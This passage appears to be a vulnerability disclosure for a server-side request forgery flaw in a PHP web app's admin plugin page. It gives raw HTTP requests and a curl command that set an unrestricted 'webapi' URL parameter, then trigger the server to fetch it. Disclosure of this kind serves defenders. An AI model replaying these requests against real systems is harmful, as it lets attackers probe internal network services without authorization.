Because the webapi parameters are not limited, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

PoC stage 1: the value of the webapi to set

    POST /index.php/admins/Plugins/index.html HTTP/1.1
    Host: 172.16.119.130
    Content-Length: 51
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://172.16.119.130
    Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
    Connection: close
    
    set=1&webapi=http%3A%2F%2F127.0.0.1%2Fwebapipoc.php
    

You can also use the following curl command to verify the vulnerability as PoC Stage 1

    curl -i -s -k -X $'POST' \
        -H $'Host: 172.16.119.130' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' -H $'Content-Length: 51' \
        -b $'think_var=zh-cn; PHPSESSID=g3e5nupqb19trokgr9msul8d9l' \
        --data-binary $'set=1&webapi=http%3A%2F%2F127.0.0.1%2Fwebapipoc.php' \
        $'http://172.16.119.130/index.php/admins/Plugins/index.html'
    

PoC stage 2:

    GET /index.php/admins/Plugins/index.html HTTP/1.1
    Host: 172.16.119.130
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
    Connection: close
    

Eventually we can see the corresponding request in the apache server logs, which proves that the SSRF vulnerability can be triggered

Tag

#apple